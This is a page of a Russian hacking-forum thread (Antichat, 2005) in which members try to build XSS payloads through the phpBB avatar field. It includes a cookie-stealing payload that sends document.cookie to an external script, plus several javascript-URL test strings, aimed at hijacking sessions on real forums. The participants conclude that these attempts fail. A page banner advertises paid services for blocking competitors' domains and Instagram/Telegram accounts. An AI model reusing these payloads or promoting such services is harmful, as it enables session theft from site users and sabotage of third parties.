XSS в phpBB

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
XSS в phpBB

Страница 3 из 4

Опции темы

Поиск в этой теме

Опции просмотра

#21

15.01.2005, 17:47

Че Гевара

Администратор

Регистрация: 05.10.2003

Сообщений: 1,083

С нами: 11893346

Репутация: 45

Цитата:

Сообщение от b00

Ой ли. У меня на форуме кавычки спокойно квотируются:
<img src="http://avatar.com/x.jpg" bb="http://antichat.ru

А так проходит?

Код:

  http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)

Последний раз редактировалось Че Гевара; 15.01.2005 в 18:20..

#22

15.01.2005, 17:57

b00

Новичок

Регистрация: 15.01.2005

Сообщений: 4

С нами: 11219101

Репутация: 0

Цитата:

Сообщение от Че Гевара

А так проходит?

Код:

 http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)

такая длинная конструкция - нет

<img src="http://aaa.bb/x.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:documen" alt="" /><br />

Да и админы уже года 2 IE не юзают

#23

15.01.2005, 18:58

b00

Новичок

Регистрация: 15.01.2005

Сообщений: 4

С нами: 11219101

Репутация: 0

загнал в аватар тестовую строку
<img src="http://abc.ru/x.gif` style=`background:url(javascript:alert())" alt="" border="0" /><br /><br />

в IE не отработало

#24

15.01.2005, 19:53

Че Гевара

Администратор

Регистрация: 05.10.2003

Сообщений: 1,083

С нами: 11893346

Репутация: 45

Он и не сработает ... Я что-то перемудрил по ходу дела....
По идее, сработает он в таком случае:

Код:

 <img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert()) alt="" border="0">

Но т.к. кавычки преобразуются, то он тоже не сработает ...)
Сейчас подумаем еще ...

#25

15.01.2005, 20:03

SHiTS

Участник форума

Регистрация: 11.12.2004

Сообщений: 242

С нами: 11269766

Репутация: 39

вот смотрю на вас и не знаю че сказать...

#26

15.01.2005, 20:14

Че Гевара

Администратор

Регистрация: 05.10.2003

Сообщений: 1,083

С нами: 11893346

Репутация: 45

Как бы Егор меня не путал, по идее оба скрипта синтаксически верны:

Код:

     <img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert('1')) alt="" border="0">
     <img src=`http://abc.ru/x.gif`style=background-image:url(javascript:alert('2')) alt="" border="0">

И вот в чем была моя ошибка и чего я не учел:
Аватара отображается как

Код:

     <img src="http:/site/1.jpg" alt="" border="0" />

И само собой разумеется, что я предложил синтаксически неверно (в нашем случае):

Код:

      http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)

Все это преобразуется в <img src=" http://www.smailiki.nm.ru/lam/lam4.gif` .... ... что является галиматьей полной и естесственно не сработает ...
Получается - раз кавычки преобразуются в " , то за пределы <img src="... никуда не выйти ...

Извиняюсь за свою ошибку - просто я не вчитался в тему ...

Последний раз редактировалось Че Гевара; 15.01.2005 в 20:18..